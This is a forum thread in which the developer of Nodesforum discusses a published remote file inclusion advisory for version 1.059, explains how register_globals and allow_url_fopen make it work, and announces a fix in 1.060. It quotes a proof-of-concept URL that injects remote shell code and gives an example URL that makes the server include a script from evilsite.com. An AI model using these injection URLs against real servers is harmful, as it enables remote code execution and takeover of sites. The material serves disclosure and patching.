search for: in: entire forum this post
you are here: root => Annoncements => Nodesforum 1.059 Remote File Inclusion Vulnerability
member since:
folders:
10
posts:
22
replies:
75

Nodesforum 1.059 Remote File Inclusion Vulnerability

quote
# Exploit Title: nodesforum 1.059 Remote File Inclusion Vulnerability
# Google Dork: inurl: powered by Nodesforum
# Date: 6/23/2011
# Author: bd0rk ( bd0rk[at]hackermail.com )
# Software-Download: http://home.nodesforum.com/download?file=nodesforum_1.059_wi​th_bbcode_1.004.zip
# Tested on: Ubuntu-Linux / WinVista
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerable Code in 3rd_party_limits.php line 6 - 8

---------------------------------------------------------​-----------------------------------------------------

$limits_cache_url=$_nodesforum_code_path.'cache/'.$_nodes​forum_db_table_name_modifier.'_3rd_party_limits.php';
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time()-(24*3600*14)))
{include($limits_cache_url);}

---------------------------------------------------------​-----------------------------------------------------

The parameter $limits_cache_url is declared with the other parameter $_nodesforum_code_path
So we can use the declared.




PoC: http://[target_host]/nodesforum/3rd_party_limits.php?_nodesf​orum_code_path=[RemoteShellCode]


Fixtip: Declare $_nodesforum_code_path, likewise!


Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)



#### The 22 years old, german Hacker bd0rk #### <---white-hat
source: http://www.exploit-db.com/exploits/17446/



I was never 100% convinced that this vulnerability ever really existed in 1.059 because it was already discovered by someone else in 1.045 and fixed in 1.046. And back in the days of 1.046 I had tested the exploit myself and had received the confirmation from the person who had found the vulnerability that the fix of 1.046 was now preventing it. But somehow hacker bd0rk recently came forward, pretending that he was able to accomplish this exploit on 1.059.

Even though I never really understood how that could work for him, I still did apply an extra security against this in Nodesforum 1.060. Rob Keith from securityfocus.com has just confirmed to me that this exploit would fail in the latest version of the forum. so in other words, maybe the vulnerability existed before, maybe not, but one way or another now I know that it will not be possible. You can just look at the new code to see for yourself in 1.060 3rd_party_limits.php line 6 - 8

wassaa


test: test
post #227 permalink
please login to reply
member since:
folders:
10
posts:
22
replies:
75
Anyways I must say that this bd0rk is not super friendly, of all my attempts to talk to him about the exploit and ask him for more information he only once answered me a very minimal answer confirming that he was using nodesforum 1.059 indeed. He never accepted to give me more information about how he was accomplishing the exploit or if he could confirm to me that 1.060 fixed the hole. Even though im 99.99999999% sure it does and Rob Keith from securityfocus.com confirmed that "Looking through the latest code, the exploit would fail as described." but Im not sure if he was referring to the 1.059 or the 1.060.

In case you did not know, what ppl do to accomplish this type of "remote file inclusion" is using the register_globals feature of PHP. What this feature does is transpose $_GET variables in normal variables in the execution of the script. For example if on a PHP server with register_globals on I went to the url http://website.com/webpage?varname=varvalue this would be the same as adding
code:
$varname='varvalue';

at the beginning of the script.

So the problem is if you have in a certain PHP file, like in the nodesforum, something like
code:
include($nodesforum_code_path.'/somecode.php');

and that the $nodesforum_code_path is not declared in this PHP file because this file is meant to be included by another file which is responsible for setting $nodesforum_code_path. Someone could use this as a door to run their own PHP scripts in your server, by going to http://website.com/webpage?nodesforum_code_path=http://evil​site.com/evilscript.php? it ends up running
code:
include('http://evilsite.com/evilscript.php?/somecode.php');



Now next the server also needs to have "allow_url_fopen" enabled so that the server can be able to include() the remote (http://) script.

And if you are wondering what kind of script is the attacker going to be running on your server, take a look at this:


good song!


http://www.google.ca/search?q=c99+remote+inclusion

So in other words to be vulnerable to this kind of attack you need to run your PHP with "register_globals" enabled and "allow_url_fopen". If you are running on your own server it is highly encouraged that you do not enable "register_globals" this is mostly required by old PHP scripts that were built a long time ago. but it may be hard to not have "allow_url_fopen" enabled because it can be useful for many things. If you are using a *shared server, most chances are that all this is going to be enabled because they want to make sure everything will work for everyone. As a side note to all the attackers who have been trying themselves since the publication of this potential security hole, the nodesforum server does not have "register_globals" enabled so these attacks are useless.

The only mystery that remains with this story is that initially when I first created the nodesforum, beeing completely unaware of the existence of the "register_globals" feature, I had left this huge security hole in the forum script. It was not an issue for me because my "register_globals" was off by default (thanks Ubuntu!), but someone pointed it out and I made a fix in the version 1.046 of the forum. I still look at my 1.046 fix today and it looks good to me, I cannot see how the remote inclusion attack could succeed with this security but this person bd0rk claims that he can perform the file inclusion attack on 1.059. And reconfirmed.

So anyways I decided to not take any chance and I toughed of a new security that could protect against this, I added the new security to the old one to put all the chances on my side. If you are using the Nodesforum on a shared server, I highly recommend that you upgrade to Nodesforum 1.060 or higher to protect yourself against this kind of attack.

wassaa


test: test
post #228 permalink
a guest
I'm REALLY, REALLY HAPPY that this issue was laid to rest as I had been wanting to use NodesForum for a VERY long time.
This is the next to last barrier preventing me from forging ahead with my eCommerce site (shopping carts are squirrelly business - ).
Thanks again for addressing this matter and I've promptly downloaded 1.060 - YAY!!!!!!!!!!!!!!!!!
post #230 permalink
member since:
folders:
10
posts:
22
replies:
75
I am happy that these hackers are finding these bugs and posting them online. It helps me make a more secure product.

wassaa


test: test
post #231 permalink
a guest
Nobody should be using register globals in this day and age.

It wasn't your scripts fault, it was the users configuration.
post #238 permalink
please login to reply

moderators of this post

envis (level: ∞)
powered by Nodesforum